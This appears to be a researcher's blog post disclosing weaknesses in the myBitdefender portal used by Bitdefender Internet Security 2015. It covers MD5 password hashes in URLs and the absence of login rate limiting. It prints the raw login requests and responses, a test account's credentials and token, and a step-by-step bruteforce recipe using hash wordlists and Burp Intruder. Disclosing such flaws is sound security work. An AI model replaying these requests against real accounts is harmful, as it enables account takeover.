Flaws in Bitdefender Portal

There seem to be some security issues with the way Bitdefender Internet Security 2015 software (Build 18.20.0.1429) interacts with its myBitdefender online portal.

Issues:
1) Possible partial information disclosure privacy issue of users’ myBitdefender account credentials when using the SAFEGO functionality for Facebook.
2) Bruteforce of passwords for myBitdefender accounts are possible using the method below.

ISSUE 1

To illustrate issue 1, I have created a spare account on myBitdefender at https://my.bitdefender.com with the following credentials:

Login ID: jerold.usa@gmail.com
Password: password1

Upon clicking on the SAFEGO “Reports for Facebook” link from Bitdefender’s user interface under the “Tools” tab, a web URL link will be open:

https://my.bitdefender.com/en_US/my/#page=safego.facebook_index&?login=jerold.usa@gmail.com&passmd5=7c6a180b36896a0a8c02787eeafb0e4c&lang=en_us

Note the HTTP parameter passmd5 which contains the value “7c6a180b36896a0a8c02787eeafb0e4c”. It is a simple trivial hashing of the plaintext password “password1” using the MD5 algorithm which is “broken” in some sense.

A malicious attacker that has gotten hold of the hash can do a simple reverse lookup using the many available MD5 hash databases online.

In my simple test I used http://www.md5online.org/ with the hash “7c6a180b36896a0a8c02787eeafb0e4c” and was given the plaintext password of value “password1”.

ISSUE 2:

Another point of concern is the HTTP response that was received when the HTTP GET request with valid credentials below was sent:

GET /lv2/account?login=jerold.usa%40gmail.com&passmd5=7c6a180b36896a0a8c0278
7eeafb0e4c&type=userpass HTTP/1.1
Host: my.bitdefender.com
Connection: keep-alive
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Referer: https://my.bitdefender.com/login
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: com.bitdefender.mybd.lang=%7B%22lang%22%3A%7B%22name%22%3A%22en_us%22%7D
%2C%22expire%22%3Anull%7D; _ga=GA1.3.1523623201.1421739258; _gat=1

The HTTP response was a JSON response from the server:

{
"token": "Wa6QqAuiUlrKRYcvnZZIEGI00TM",
"passmd5": "7c6a180b36896a0a8c02787eeafb0e4c",
"country_id": "192",
"login": "jerold.usa@gmail.com",
"preferences": "{\"lang\": \"en_us\"}"
}

Notice that the passmd5 parameter is passed back in clear. Also, it is noted that even after multiple logouts, the token value returned is still the same.

Passing a HTTP GET request below with invalid credentials has the following behavior:

GET /lv2/account?login=jerold.usa%40gmail.com&passmd5=7c6a180b36896a0a8c0278
7eeafb0e4d&type=userpass HTTP/1.1
Host: my.bitdefender.com
Connection: keep-alive
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Referer: https://my.bitdefender.com/login
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: com.bitdefender.mybd.lang=%7B%22lang%22%3A%7B%22name%22%3A%22en_us%22%7D
%2C%22expire%22%3Anull%7D; _gat=1; _ga=GA1.3.1523623201.1421739258; com.bitdefender.mybd=%7B%22user%22%3A%22jerold.usa@gmail.com%22%2C%22tok
en%22%3A%22Wa6QqAuiUlrKRYcvnZZIEGI00TM%22%2C%22country_id%22%3A%22192%22
%2C%22lang%22%3A%7B%22name%22%3A%22en_us%22%7D%2C%22expiry%22%3A14217423
42979%2C%22remember%22%3Afalse%7D

The HTTP response was a JSON response from the server:

{
"captcha": "false",
"error": "wrong_login"
}

Notice that the server responded with wrong login, indicating that the login failed. There is no form of captcha that tracks the number of failed logins before locking the account for a said period of time, which is ideal for a bruteforce attack.

Bruteforce attack scenario:

1. Obtain a dictionary wordlist of md5 hashes which is easily available online. A quick Google shows that some wordlists have more than 376,484,923,572 hashes.
2. Obtain the target’s email address.
3. Code a script to send the GET request as below, substituting the login and passmd5 HTTP parameters with the target’s email address and hashes from the wordlist. Alternatively, BurpSuite’s intruder would be perfect for this case. Load the wordlist and use sniper-mode to start the bruteforce.
4. Observe the HTTP response. if a response similar to the one below is found, the account has been compromised, allowing the attacker access to all Bitdefender online functionalities.

{
"token": "Wa6QqAuiUlrKRYcvnZZIEGI00TM",
"passmd5": "7c6a180b36896a0a8c02787eeafb0e4c",
"country_id": "192",
"login": "jerold.usa@gmail.com",
"preferences": "{\"lang\": \"en_us\"}"
}

Seeing how Bitdefender’s popularity has grown in recent years, I would expect a “more secure” approach to handling such potentially sensitive data…

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s